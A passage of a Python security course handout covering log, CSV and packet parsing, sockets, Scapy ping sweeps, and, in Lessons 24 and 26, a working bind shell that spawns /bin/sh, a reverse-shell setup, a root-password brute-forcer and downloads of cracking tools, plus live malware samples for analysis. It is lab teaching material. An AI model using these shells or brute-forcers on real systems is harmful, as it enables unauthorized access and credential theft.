1381 | ||
1382 | Working with another student after class we came up with another solution: | |
1383 | ||
1384 | #!/usr/bin/env python | |
1385 | ||
1386 | ||
1387 | # This line opens the log file | |
1388 | f=open('access_log',"r") | |
1389 | ||
1390 | # This line takes each line in the log file and stores it as an element in the list | |
1391 | lines = f.readlines() | |
1392 | ||
1393 | ||
1394 | # This lines stores the IP that the user types as a var called userinput | |
1395 | userinput = raw_input("Enter the IP you want to search for: ") | |
1396 | ||
1397 | ||
1398 | ||
1399 | # This combination for loop and nested if statement looks for the IP in the list called lines and prints the entire line if found. | |
1400 | for ip in lines: | |
1401 | if ip.find(userinput) != -1: | |
1402 | print ip | |
1403 | ||
1404 | ||
1405 | ||
1406 | ################################################## | |
1407 | # Lession 14: Look for web attacks in a log file # | |
1408 | ################################################## | |
1409 | ||
1410 | In this lab we will be looking at the scan_log.py script and it will scan the server log to find out common hack attempts within your web server log. | |
1411 | Supported attacks: | |
1412 | 1. SQL Injection | |
1413 | 2. Local File Inclusion | |
1414 | 3. Remote File Inclusion | |
1415 | 4. Cross-Site Scripting | |
1416 | ||
1417 | ||
1418 | ||
1419 | wget https://s3.amazonaws.com/SecureNinja/Python/scan_log.py | |
1420 | ||
1421 | The usage for scan_log.py is simple. You feed it an apache log file. | |
1422 | ||
1423 | cat scan_log.py | less (use your up/down arrow keys to look through the file) | |
1424 | ||
1425 | Explain to me how this script works. | |
1426 | ||
1427 | ||
1428 | ||
1429 | ################################ | |
1430 | # Lesson 15: Parsing CSV Files # | |
1431 | ################################ | |
1432 | ||
1433 | Dealing with csv files | |
1434 | ||
1435 | Reference: | |
1436 | http://www.pythonforbeginners.com/systems-programming/using-the-csv-module-in-python/ | |
1437 | ||
1438 | Type the following commands: | |
1439 | --------------------------------------------------------------------------------------------------------- | |
1440 | ||
1441 | wget https://s3.amazonaws.com/SecureNinja/Python/class_nessus.csv | |
1442 | ||
1443 | ||
1444 | Example 1 - Reading CSV files | |
1445 | ----------------------------- | |
1446 | #To be able to read csv formated files, we will first have to import the | |
1447 | #csv module. | |
1448 | ||
1449 | ||
1450 | import csv | |
1451 | with open('class_nessus.csv', 'rb') as f: | |
1452 | reader = csv.reader(f) | |
1453 | for row in reader: | |
1454 | print row | |
1455 | ||
1456 | ||
1457 | ||
1458 | ||
1459 | ||
1460 | ||
1461 | Example 2 - Reading CSV files | |
1462 | ----------------------------- | |
1463 | vi readcsv.py | |
1464 | ||
1465 | ||
1466 | #!/usr/bin/python | |
1467 | import csv # imports the csv module | |
1468 | import sys # imports the sys module | |
1469 | ||
1470 | f = open(sys.argv[1], 'rb') # opens the csv file | |
1471 | try: | |
1472 | reader = csv.reader(f) # creates the reader object | |
1473 | for row in reader: # iterates the rows of the file in orders | |
1474 | print row # prints each row | |
1475 | finally: | |
1476 | f.close() # closing | |
1477 | ||
1478 | ||
1479 | ||
1480 | ||
1481 | ||
1482 | ||
1483 | Example 3 - - Reading CSV files | |
1484 | ------------------------------- | |
1485 | vi readcsv2.py | |
1486 | ||
1487 | ||
1488 | #!/usr/bin/python | |
1489 | # This program will then read it and displays its contents. | |
1490 | ||
1491 | ||
1492 | import csv | |
1493 | ||
1494 | ifile = open('class_nessus.csv', "rb") | |
1495 | reader = csv.reader(ifile) | |
1496 | ||
1497 | rownum = 0 | |
1498 | for row in reader: | |
1499 | # Save header row. | |
1500 | if rownum == 0: | |
1501 | header = row | |
1502 | else: | |
1503 | colnum = 0 | |
1504 | for col in row: | |
1505 | print '%-8s: %s' % (header[colnum], col) | |
1506 | colnum += 1 | |
1507 | ||
1508 | rownum += 1 | |
1509 | ||
1510 | ifile.close() | |
1511 | ||
1512 | ||
1513 | ||
1514 | ||
1515 | ||
1516 | ||
1517 | ||
1518 | ||
1519 | python readcsv2.py | less | |
1520 | ||
1521 | ||
1522 | ||
1523 | ||
1524 | ||
1525 | ||
1526 | ||
1527 | ||
1528 | /---------------------------------------------------/ | |
1529 | --------------------PARSING CSV FILES---------------- | |
1530 | /---------------------------------------------------/ | |
1531 | ||
1532 | -------------TASK 1------------ | |
1533 | vi readcsv3.py | |
1534 | ||
1535 | #!/usr/bin/python | |
1536 | import csv | |
1537 | f = open('class_nessus.csv', 'rb') | |
1538 | try: | |
1539 | rownum = 0 | |
1540 | reader = csv.reader(f) | |
1541 | for row in reader: | |
1542 | #Save header row. | |
1543 | if rownum == 0: | |
1544 | header = row | |
1545 | else: | |
1546 | colnum = 0 | |
1547 | if row[3].lower() == 'high': | |
1548 | print '%-1s: %s %-1s: %s %-1s: %s %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6]) | |
1549 | rownum += 1 | |
1550 | finally: | |
1551 | f.close() | |
1552 | ||
1553 | ||
1554 | ||
1555 | ||
1556 | ||
1557 | python readcsv3.py | less | |
1558 | ||
1559 | -------------TASK 2------------ | |
1560 | vi readcsv4.py | |
1561 | ||
1562 | #!/usr/bin/python | |
1563 | import csv | |
1564 | f = open('class_nessus.csv', 'rb') | |
1565 | try: | |
1566 | print '/---------------------------------------------------/' | |
1567 | rownum = 0 | |
1568 | hosts = {} | |
1569 | reader = csv.reader(f) | |
1570 | for row in reader: | |
1571 | # Save header row. | |
1572 | if rownum == 0: | |
1573 | header = row | |
1574 | else: | |
1575 | colnum = 0 | |
1576 | if row[3].lower() == 'high' and row[4] not in hosts: | |
1577 | hosts[row[4]] = row[4] | |
1578 | print '%-1s: %s %-1s: %s %-1s: %s %-1s: %s' % (header[3], row[3],header[4], row[4],header[5], row[5],header[6], row[6]) | |
1579 | rownum += 1 | |
1580 | finally: | |
1581 | f.close() | |
1582 | ||
1583 | ||
1584 | python readcsv4.py | less | |
1585 | ||
1586 | ||
1587 | ||
1588 | ||
1589 | ||
1590 | ||
1591 | ||
1592 | ||
1593 | ||
1594 | ||
1595 | ||
1596 | ||
1597 | ||
1598 | ||
1599 | ################################################# | |
1600 | # Lesson 16: Parsing Packets with Python's DPKT # | |
1601 | ################################################# | |
1602 | The first thing that you will need to do is install dpkt. | |
1603 | ||
1604 | sudo apt-get install -y python-dpkt | |
1605 | ||
1606 | ||
1607 | ||
1608 | ||
1609 | Now cd to your courseware directory, and the cd into the subfolder '2-PCAP-Parsing/Resources'. | |
1610 | Run tcpdump to capture a .pcap file that we will use for the next exercise | |
1611 | ||
1612 | ||
1613 | sudo tcpdump -ni eth0 -s0 -w quick.pcap | |
1614 | ||
1615 | ||
1616 | --open another command prompt-- | |
1617 | wget http://packetlife.net/media/library/12/tcpdump.pdf | |
1618 | ||
1619 | ||
1620 | Let's do something simple: | |
1621 | ||
1622 | ||
1623 | vi quickpcap.py | |
1624 | -------------------------------------------------------- | |
1625 | ||
1626 | #!/usr/bin/python | |
1627 | import dpkt; | |
1628 | ||
1629 | # Simple script to read the timestamps in a pcap file | |
1630 | # Reference: http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-0-simple-example-how-to.html | |
1631 | ||
1632 | f = open("quick.pcap","rb") | |
1633 | pcap = dpkt.pcap.Reader(f) | |
1634 | ||
1635 | for ts, buf in pcap: | |
1636 | print ts; | |
1637 | ||
1638 | f.close(); | |
1639 | ||
1640 | ||
1641 | -------------------------------------------------------- | |
1642 | ||
1643 | Now let's run the script we just wrote | |
1644 | ||
1645 | ||
1646 | python quickpcap.py | |
1647 | ||
1648 | ||
1649 | ||
1650 | ||
1651 | How dpkt breaks down a packet: | |
1652 | ||
1653 | Reference: | |
1654 | http://superbabyfeng.blogspot.com/2009/05/dpkt-tutorial-1-dpkt-sub-modules.html | |
1655 | ||
1656 | src: the MAC address of SOURCE. | |
1657 | dst: The MAC address of DESTINATION | |
1658 | type: The protocol type of contained ethernet payload. | |
1659 | ||
1660 | The allowed values are listed in the file "ethernet.py", | |
1661 | such as: | |
1662 | a) ETH_TYPE_IP: It means that the ethernet payload is IP layer data. | |
1663 | b) ETH_TYPE_IPX: Means that the ethernet payload is IPX layer data. | |
1664 | ||
1665 | ||
1666 | References: | |
1667 | http://stackoverflow.com/questions/6337878/parsing-pcap-files-with-dpkt-python | |
1668 | ||
1669 | ||
1670 | ||
1671 | ||
1672 | ||
1673 | ||
1674 | Ok - now let's have a look at pcapparsing.py | |
1675 | ||
1676 | sudo tcpdump -ni eth0 -s0 -w capture-100.pcap | |
1677 | ||
1678 | ||
1679 | --open another command prompt-- | |
1680 | wget http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf | |
1681 | ||
1682 | ||
1683 | ||
1684 | Ok - now let's have a look at pcapparsing.py | |
1685 | -------------------------------------------------------- | |
1686 | ||
1687 | import socket | |
1688 | import dpkt | |
1689 | import sys | |
1690 | f = open('capture-100.pcap','r') | |
1691 | pcapReader = dpkt.pcap.Reader(f) | |
1692 | ||
1693 | for ts,data in pcapReader: | |
1694 | ether = dpkt.ethernet.Ethernet(data) | |
1695 | if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise | |
1696 | ip = ether.data | |
1697 | tcp = ip.data | |
1698 | src = socket.inet_ntoa(ip.src) | |
1699 | srcport = tcp.sport | |
1700 | dst = socket.inet_ntoa(ip.dst) | |
1701 | dstport = tcp.dport | |
1702 | print "src: %s (port : %s)-> dest: %s (port %s)" % (src,srcport ,dst,dstport) | |
1703 | ||
1704 | f.close() | |
1705 | ||
1706 | -------------------------------------------------------- | |
1707 | ||
1708 | ||
1709 | ||
1710 | OK - let's run it: | |
1711 | python pcapparsing.py | |
1712 | ||
1713 | ||
1714 | ||
1715 | running this script might throw an error like this: | |
1716 | ||
1717 | Traceback (most recent call last): | |
1718 | File "pcapparsing.py", line 9, in <module> | |
1719 | if ether.type != dpkt.ethernet.ETH_TYPE_IP: raise | |
1720 | ||
1721 | ||
1722 | If it does it is just because your packet has something in it that we didn't specify (maybe ICMP, or something) | |
1723 | ||
1724 | ||
1725 | ||
1726 | ||
1727 | Your homework for today... | |
1728 | ||
1729 | ||
1730 | Rewrite this pcapparsing.py so that it prints out the timestamp, the source and destination IP addresses, and the source and destination ports. | |
1731 | ||
1732 | ||
1733 | ||
1734 | ||
1735 | ||
1736 | ||
1737 | Your challenge is to fix the Traceback error | |
1738 | ||
1739 | ||
1740 | ||
1741 | ||
1742 | #!/usr/bin/python | |
1743 | ||
1744 | import pcapy | |
1745 | import dpkt | |
1746 | import sys | |
1747 | import socket | |
1748 | import struct | |
1749 | ||
1750 | SINGLE_SHOT = False | |
1751 | ||
1752 | # list all the network devices | |
1753 | pcapy.findalldevs() | |
1754 | ||
1755 | iface = "eth0" | |
1756 | filter = "arp" | |
1757 | max_bytes = 1024 | |
1758 | promiscuous = False | |
1759 | read_timeout = 100 # in milliseconds | |
1760 | ||
1761 | pc = pcapy.open_live( iface, max_bytes, promiscuous, read_timeout ) | |
1762 | pc.setfilter( filter ) | |
1763 | ||
1764 | # callback for received packets | |
1765 | def recv_pkts( hdr, data ): | |
1766 | packet = dpkt.ethernet.Ethernet( data ) | |
1767 | ||
1768 | print type( packet.data ) | |
1769 | print "ipsrc: %s, ipdst: %s" %( \ | |
1770 | socket.inet_ntoa( packet.data.spa ), \ | |
1771 | socket.inet_ntoa( packet.data.tpa ) ) | |
1772 | ||
1773 | print "macsrc: %s, macdst: %s " % ( | |
1774 | "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.sha), | |
1775 | "%x:%x:%x:%x:%x:%x" % struct.unpack("BBBBBB",packet.data.tha ) ) | |
1776 | ||
1777 | if SINGLE_SHOT: | |
1778 | header, data = pc.next() | |
1779 | sys.exit(0) | |
1780 | else: | |
1781 | packet_limit = -1 # infinite | |
1782 | pc.loop( packet_limit, recv_pkts ) # capture packets | |
1783 | ||
1784 | ||
1785 | ||
1786 | ||
1787 | ||
1788 | ||
1789 | ||
1790 | ||
1791 | ############################# | |
1792 | # Reference Videos To Watch # | |
1793 | ############################# | |
1794 | Here is your second set of youtube videos that I'd like for you to watch: | |
1795 | https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 11-20) | |
1796 | ||
1797 | ||
1798 | ||
1799 | ||
1800 | ############################################# | |
1801 | # Lesson 17: Python Sockets & Port Scanning # | |
1802 | ############################################# | |
1803 | ||
1804 | ||
1805 | $ ncat -l -v -p 1234 | |
1806 | ||
1807 | ||
1808 | ||
1809 | ||
1810 | --open another terminal-- | |
1811 | python | |
1812 | ||
1813 | >>> import socket | |
1814 | >>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
1815 | >>> s.connect(('localhost', 1234)) | |
1816 | >>> s.send('Hello, world') | |
1817 | >>> data = s.recv(1024) | |
1818 | >>> s.close() | |
1819 | ||
1820 | >>> print 'Received', data | |
1821 | ||
1822 | ||
1823 | ||
1824 | ||
1825 | ||
1826 | ||
1827 | ######################################## | |
1828 | # Lesson 18: TCP Client and TCP Server # | |
1829 | ######################################## | |
1830 | ||
1831 | vi tcpclient.py | |
1832 | ||
1833 | ||
1834 | ||
1835 | #!/usr/bin/python | |
1836 | # tcpclient.py | |
1837 | ||
1838 | import socket | |
1839 | ||
1840 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
1841 | hostport = ("127.0.0.1", 1337) | |
1842 | s.connect(hostport) | |
1843 | s.send("Hello\n") | |
1844 | buf = s.recv(1024) | |
1845 | print "Received", buf | |
1846 | ||
1847 | ||
1848 | ||
1849 | ||
1850 | ||
1851 | ||
1852 | ||
1853 | ||
1854 | ||
1855 | vi tcpserver.py | |
1856 | ||
1857 | ||
1858 | ||
1859 | ||
1860 | ||
1861 | #!/usr/bin/python | |
1862 | # tcpserver.py | |
1863 | ||
1864 | import socket | |
1865 | ||
1866 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
1867 | hostport = ("", 1337) | |
1868 | s.bind(hostport) | |
1869 | s.listen(10) | |
1870 | while 1: | |
1871 | cli,addr = s.accept() | |
1872 | print "Connection from", addr | |
1873 | buf = cli.recv(1024) | |
1874 | print "Received", buf | |
1875 | if buf == "Hello\n": | |
1876 | cli.send("Server ID 1\n") | |
1877 | cli.close() | |
1878 | ||
1879 | ||
1880 | ||
1881 | ||
1882 | ||
1883 | ||
1884 | ||
1885 | ||
1886 | python tcpserver.py | |
1887 | ||
1888 | ||
1889 | --open another terminal-- | |
1890 | python tcpclient.py | |
1891 | ||
1892 | ||
1893 | ######################################## | |
1894 | # Lesson 19: UDP Client and UDP Server # | |
1895 | ######################################## | |
1896 | ||
1897 | vi udpclient.py | |
1898 | ||
1899 | ||
1900 | ||
1901 | ||
1902 | ||
1903 | ||
1904 | #!/usr/bin/python | |
1905 | # udpclient.py | |
1906 | ||
1907 | import socket | |
1908 | ||
1909 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) | |
1910 | hostport = ("127.0.0.1", 1337) | |
1911 | s.sendto("Hello\n", hostport) | |
1912 | buf = s.recv(1024) | |
1913 | print buf | |
1914 | ||
1915 | ||
1916 | ||
1917 | ||
1918 | ||
1919 | ||
1920 | ||
1921 | ||
1922 | ||
1923 | vi udpserver.py | |
1924 | ||
1925 | ||
1926 | ||
1927 | ||
1928 | ||
1929 | ||
1930 | #!/usr/bin/python | |
1931 | # udpserver.py | |
1932 | ||
1933 | import socket | |
1934 | ||
1935 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) | |
1936 | hostport = ("127.0.0.1", 1337) | |
1937 | s.bind(hostport) | |
1938 | while 1: | |
1939 | buf, address = s.recvfrom(1024) | |
1940 | print buf | |
1941 | if buf == "Hello\n": | |
1942 | s.sendto("Server ID 1\n", address) | |
1943 | ||
1944 | ||
1945 | ||
1946 | ||
1947 | ||
1948 | ||
1949 | python udpserver.py | |
1950 | ||
1951 | ||
1952 | --open another terminal-- | |
1953 | python udpclient.py | |
1954 | ||
1955 | ||
1956 | ||
1957 | ||
1958 | ||
1959 | ||
1960 | ############################### | |
1961 | # Lesson 20: Installing Scapy # | |
1962 | ############################### | |
1963 | ||
1964 | sudo apt-get update | |
1965 | sudo apt-get install python-scapy python-pyx python-gnuplot | |
1966 | ||
1967 | ||
1968 | Reference Page For All Of The Commands We Will Be Running: | |
1969 | http://samsclass.info/124/proj11/proj17-scapy.html | |
1970 | ||
1971 | Great slides for Scapy: | |
1972 | http://www.secdev.org/conf/scapy_csw05.pdf | |
1973 | ||
1974 | ||
1975 | ||
1976 | ||
1977 | To run Scapy interactively | |
1978 | ||
1979 | sudo scapy | |
1980 | ||
1981 | ||
1982 | ||
1983 | ################################################ | |
1984 | # Lesson 21: Sending ICMPv4 Packets with scapy # | |
1985 | ################################################ | |
1986 | ||
1987 | In the Linux machine, in the Terminal window, at the >>> prompt, type this command, and then press the Enter key: | |
1988 | ||
1989 | i = IP() | |
1990 | ||
1991 | ||
1992 | ||
1993 | ||
1994 | This creates an object named i of type IP. To see the properties of that object, use the display() method with this command: | |
1995 | ||
1996 | i.display() | |
1997 | ||
1998 | ||
1999 | ||
2000 | ||
2001 | Use these commands to set the destination IP address and display the properties of the i object again. Replace the IP address in the first command with the IP address of your target Windows machine: | |
2002 | ||
2003 | i.dst="10.65.75.49" | |
2004 | ||
2005 | i.display() | |
2006 | ||
2007 | ||
2008 | ||
2009 | ||
2010 | Notice that scapy automatically fills in your machine's source IP address. | |
2011 | ||
2012 | Use these commands to create an object named ic of type ICMP and display its properties: | |
2013 | ||
2014 | ||
2015 | ic = ICMP() | |
2016 | ||
2017 | ic.display() | |
2018 | ||
2019 | ||
2020 | ||
2021 | ||
2022 | ||
2023 | Use this command to send the packet onto the network and listen to a single packet in response. Note that the third character is the numeral 1, not a lowercase L: | |
2024 | ||
2025 | sr1(i/ic) | |
2026 | ||
2027 | ||
2028 | ||
2029 | ||
2030 | ||
2031 | This command sends and receives one packet, of type IP at layer 3 and ICMP at layer 4. As you can see in the image above, the response is shown, with ICMP type echo-reply. | |
2032 | ||
2033 | The Padding section shows the portion of the packet that carries higher-level data. In this case it contains only zeroes as padding. | |
2034 | ||
2035 | Use this command to send a packet that is IP at layer 3, ICMP at layer 4, and that contains data with your name in it (replace YOUR NAME with your own name): | |
2036 | ||
2037 | ||
2038 | sr1(i/ic/"YOUR NAME") | |
2039 | ||
2040 | ||
2041 | You should see a reply with a Raw section containing your name. | |
2042 | ||
2043 | ||
2044 | ||
2045 | ############################################## | |
2046 | # Lesson 22: Sending a UDP Packet with Scapy # | |
2047 | ############################################## | |
2048 | ||
2049 | ||
2050 | Preparing the Target | |
2051 | $ ncat -ulvp 4444 | |
2052 | ||
2053 | ||
2054 | ||
2055 | ||
2056 | --open another terminal-- | |
2057 | In the Linux machine, in the Terminal window, at the >>> prompt, type these commands, and then press the Enter key: | |
2058 | ||
2059 | u = UDP() | |
2060 | ||
2061 | u.display() | |
2062 | ||
2063 | ||
2064 | ||
2065 | This creates an object named u of type UDP, and displays its properties. | |
2066 | ||
2067 | Execute these commands to change the destination port to 4444 and display the properties again: | |
2068 | ||
2069 | i.dst="10.10.2.97" <--- replace this with a host that you can run netcat on (ex: another VM or your host computer) | |
2070 | ||
2071 | u.dport = 4444 | |
2072 | ||
2073 | u.display() | |
2074 | ||
2075 | ||
2076 | ||
2077 | Execute this command to send the packet to the Windows machine: | |
2078 | ||
2079 | send(i/u/"YOUR NAME SENT VIA UDP\n") | |
2080 | ||
2081 | ||
2082 | ||
2083 | On the Windows target, you should see the message appear | |
2084 | ||
2085 | ||
2086 | ||
2087 | ||
2088 | ####################################### | |
2089 | # Lesson 23: Ping Sweeping with Scapy # | |
2090 | ####################################### | |
2091 | ||
2092 | ||
2093 | ||
2094 | #!/usr/bin/python | |
2095 | from scapy.all import * | |
2096 | ||
2097 | TIMEOUT = 2 | |
2098 | conf.verb = 0 | |
2099 | for ip in range(0, 256): | |
2100 | packet = IP(dst="10.10.30." + str(ip), ttl=20)/ICMP() | |
2101 | # You will need to change 10.10.30 above this line to the subnet for your network | |
2102 | reply = sr1(packet, timeout=TIMEOUT) | |
2103 | if not (reply is None): | |
2104 | print reply.dst, "is online" | |
2105 | else: | |
2106 | print "Timeout waiting for %s" % packet[IP].dst | |
2107 | ||
2108 | ||
2109 | ||
2110 | ############################################### | |
2111 | # Checking out some scapy based port scanners # | |
2112 | ############################################### | |
2113 | ||
2114 | wget https://s3.amazonaws.com/SecureNinja/Python/rdp_scan.py | |
2115 | ||
2116 | cat rdp_scan.py | |
2117 | ||
2118 | sudo python rdp_scan.py | |
2119 | ||
2120 | ||
2121 | ###################################### | |
2122 | # Dealing with conf.verb=0 NameError # | |
2123 | ###################################### | |
2124 | ||
2125 | conf.verb = 0 | |
2126 | NameError: name 'conf' is not defined | |
2127 | ||
2128 | Fixing scapy - some scripts are written for the old version of scapy so you'll have to change the following line from: | |
2129 | ||
2130 | from scapy import * | |
2131 | to | |
2132 | from scapy.all import * | |
2133 | ||
2134 | ||
2135 | ||
2136 | Reference: | |
2137 | http://hexale.blogspot.com/2008/10/wifizoo-and-new-version-of-scapy.html | |
2138 | ||
2139 | ||
2140 | conf.verb=0 is a verbosity setting (configuration/verbosity = conv | |
2141 | ||
2142 | ||
2143 | ||
2144 | Here are some good Scapy references: | |
2145 | http://www.secdev.org/projects/scapy/doc/index.html | |
2146 | http://resources.infosecinstitute.com/port-scanning-using-scapy/ | |
2147 | http://www.hackerzvoice.net/ouah/blackmagic.txt | |
2148 | http://www.workrobot.com/sansfire2009/SCAPY-packet-crafting-reference.html | |
2149 | ||
2150 | ||
2151 | ###################################### | |
2152 | # Lesson 24: Bind and Reverse Shells # | |
2153 | ###################################### | |
2154 | vi simplebindshell.py | |
2155 | ||
2156 | ||
2157 | #!/bin/python | |
2158 | import os,sys,socket | |
2159 | ||
2160 | ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM); | |
2161 | print '-Creating socket..' | |
2162 | port = 31337 | |
2163 | try: | |
2164 | ls.bind(('', port)) | |
2165 | print '-Binding the port on ' | |
2166 | ls.listen(1) | |
2167 | print '-Listening, ' | |
2168 | (conn, addr) = ls.accept() | |
2169 | print '-Waiting for connection...' | |
2170 | cli= conn.fileno() | |
2171 | print '-Redirecting shell...' | |
2172 | os.dup2(cli, 0) | |
2173 | print 'In, ' | |
2174 | os.dup2(cli, 1) | |
2175 | print 'Out, ' | |
2176 | os.dup2(cli, 2) | |
2177 | print 'Err' | |
2178 | print 'Done!' | |
2179 | arg0='/bin/sh' | |
2180 | arg1='-a' | |
2181 | args=[arg0]+[arg1] | |
2182 | os.execv(arg0, args) | |
2183 | except(socket.error): | |
2184 | print 'fail\n' | |
2185 | conn.close() | |
2186 | sys.exit(1) | |
2187 | ||
2188 | ||
2189 | ||
2190 | ||
2191 | ||
2192 | ||
2193 | ||
2194 | nc TARGETIP 31337 | |
2195 | ||
2196 | ||
2197 | ||
2198 | --------------------- | |
2199 | Preparing the target for a reverse shell | |
2200 | $ ncat -lvp 4444 | |
2201 | ||
2202 | ||
2203 | ||
2204 | --open another terminal-- | |
2205 | wget https://www.trustedsec.com/files/simple_py_shell.py | |
2206 | ||
2207 | vi simple_py_shell.py | |
2208 | ||
2209 | ||
2210 | ||
2211 | ||
2212 | ||
2213 | ||
2214 | ------------------------------- | |
2215 | Tricky shells | |
2216 | ||
2217 | Reference: | |
2218 | http://securityweekly.com/2011/10/python-one-line-shell-code.html | |
2219 | http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/ | |
2220 | ||
2221 | ||
2222 | ||
2223 | ||
2224 | ||
2225 | ||
2226 | ############################# | |
2227 | # Reference Videos To Watch # | |
2228 | ############################# | |
2229 | Here is your third set of youtube videos that I'd like for you to watch: | |
2230 | https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 21-30) | |
2231 | ||
2232 | ||
2233 | ||
2234 | ||
2235 | ################################################# | |
2236 | # Lesson 25: Python Functions & String Handling # | |
2237 | ################################################# | |
2238 | ||
2239 | Python can make use of functions: | |
2240 | http://www.tutorialspoint.com/python/python_functions.htm | |
2241 | ||
2242 | ||
2243 | ||
2244 | Python can interact with the 'crypt' function used to create Unix passwords: | |
2245 | http://docs.python.org/2/library/crypt.html | |
2246 | ||
2247 | ||
2248 | ||
2249 | Tonight we will see a lot of the split() method so be sure to keep the following references close by: | |
2250 | http://www.tutorialspoint.com/python/string_split.htm | |
2251 | ||
2252 | ||
2253 | Tonight we will see a lot of slicing so be sure to keep the following references close by: | |
2254 | http://techearth.net/python/index.php5?title=Python:Basics:Slices | |
2255 | ||
2256 | ||
2257 | ||
2258 | ||
2259 | ||
2260 | ################################ | |
2261 | # Lesson 26: Password Cracking # | |
2262 | ################################ | |
2263 | ||
2264 | wget https://s3.amazonaws.com/SecureNinja/Python/htcrack.py | |
2265 | ||
2266 | vi htcrack.py | |
2267 | ||
2268 | vi list.txt | |
2269 | ||
2270 | hello | |
2271 | goodbye | |
2272 | red | |
2273 | blue | |
2274 | yourname | |
2275 | tim | |
2276 | bob | |
2277 | ||
2278 | ||
2279 | htpasswd -nd yourname | |
2280 | - enter yourname as the password | |
2281 | ||
2282 | ||
2283 | ||
2284 | python htcrack.py joe:7XsJIbCFzqg/o list.txt | |
2285 | ||
2286 | ||
2287 | ||
2288 | ||
2289 | sudo apt-get install -y python-mechanize python-pexpect python-pexpect-doc | |
2290 | ||
2291 | rm -rf mechanize-0.2.5.tar.gz | |
2292 | ||
2293 | sudo /bin/bash | |
2294 | ||
2295 | passwd | |
2296 | ***set root password*** | |
2297 | ||
2298 | ||
2299 | ||
2300 | ||
2301 | vi rootbrute.py | |
2302 | ||
2303 | ||
2304 | #!/usr/bin/env python | |
2305 | ||
2306 | import sys | |
2307 | try: | |
2308 | import pexpect | |
2309 | except(ImportError): | |
2310 | print "\nYou need the pexpect module." | |
2311 | print "http://www.noah.org/wiki/Pexpect\n" | |
2312 | sys.exit(1) | |
2313 | ||
2314 | #Change this if needed. | |
2315 | # LOGIN_ERROR = 'su: incorrect password' | |
2316 | LOGIN_ERROR = "su: Authentication failure" | |
2317 | ||
2318 | def brute(word): | |
2319 | print "Trying:",word | |
2320 | child = pexpect.spawn('/bin/su') | |
2321 | child.expect('Password: ') | |
2322 | child.sendline(word) | |
2323 | i = child.expect (['.+\s#\s',LOGIN_ERROR, pexpect.TIMEOUT],timeout=3) | |
2324 | if i == 1: | |
2325 | print "Incorrect Password" | |
2326 | ||
2327 | if i == 2: | |
2328 | print "\n\t[!] Root Password:" ,word | |
2329 | child.sendline ('id') | |
2330 | print child.before | |
2331 | child.interact() | |
2332 | ||
2333 | if len(sys.argv) != 2: | |
2334 | print "\nUsage : ./rootbrute.py <wordlist>" | |
2335 | print "Eg: ./rootbrute.py words.txt\n" | |
2336 | sys.exit(1) | |
2337 | ||
2338 | try: | |
2339 | words = open(sys.argv[1], "r").readlines() | |
2340 | except(IOError): | |
2341 | print "\nError: Check your wordlist path\n" | |
2342 | sys.exit(1) | |
2343 | ||
2344 | print "\n[+] Loaded:",len(words),"words" | |
2345 | print "[+] BruteForcing...\n" | |
2346 | for word in words: | |
2347 | brute(word.replace("\n","")) | |
2348 | ||
2349 | ||
2350 | ||
2351 | ||
2352 | References you might find helpful: | |
2353 | http://stackoverflow.com/questions/15026536/looping-over-a-some-ips-from-a-file-in-python | |
2354 | ||
2355 | ||
2356 | ||
2357 | ||
2358 | ||
2359 | ||
2360 | ||
2361 | ||
2362 | ||
2363 | wget https://s3.amazonaws.com/SecureNinja/Python/md5crack.py | |
2364 | ||
2365 | vi md5crack.py | |
2366 | ||
2367 | ||
2368 | ||
2369 | ||
2370 | ||
2371 | ||
2372 | Why use hexdigest | |
2373 | http://stackoverflow.com/questions/3583265/compare-result-from-hexdigest-to-a-string | |
2374 | ||
2375 | ||
2376 | ||
2377 | ||
2378 | http://md5online.net/ | |
2379 | ||
2380 | ||
2381 | ||
2382 | ||
2383 | ||
2384 | ||
2385 | ||
2386 | wget https://s3.amazonaws.com/SecureNinja/Python/wpbruteforcer.py | |
2387 | ||
2388 | ||
2389 | ||
2390 | ||
2391 | ############################# | |
2392 | # Reference Videos To Watch # | |
2393 | ############################# | |
2394 | Here is your forth set of youtube videos that I'd like for you to watch: | |
2395 | https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 31-40) | |
2396 | ||
2397 | ||
2398 | ||
2399 | ||
2400 | ||
2401 | ||
2402 | ||
2403 | ||
2404 | ############################### | |
2405 | # Lesson 28: Malware Analysis # | |
2406 | ############################### | |
2407 | ||
2408 | ||
2409 | ||
2410 | ||
2411 | ############################ | |
2412 | # Download the Analysis VM # | |
2413 | ############################ | |
2414 | https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip | |
2415 | user: infosecaddicts | |
2416 | pass: infosecaddicts | |
2417 | ||
2418 | ||
2419 | - Log in to your Ubuntu system with the username 'malware' and the password 'malware'. | |
2420 | ||
2421 | - After logging please open a terminal window and type the following commands: | |
2422 | ||
2423 | cd Desktop/ | |
2424 | ||
2425 | ||
2426 | - This is actual Malware (remmeber to run it in a VM - the password to extract it is 'infected': | |
2427 | ||
2428 | wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip | |
2429 | wget https://s3.amazonaws.com/StrategicSec-Files/analyse_malware.py | |
2430 | ||
2431 | unzip malware-password-is-infected.zip | |
2432 | infected | |
2433 | ||
2434 | file malware.exe | |
2435 | ||
2436 | mv malware.exe malware.pdf | |
2437 | ||
2438 | file malware.pdf | |
2439 | ||
2440 | mv malware.pdf malware.exe | |
2441 | ||
2442 | hexdump -n 2 -C malware.exe | |
2443 | ||
2444 | ***What is '4d 5a' or 'MZ'*** | |
2445 | Reference: | |
2446 | http://www.garykessler.net/library/file_sigs.html | |
2447 | ||
2448 | ||
2449 | objdump -x malware.exe | |
2450 | ||
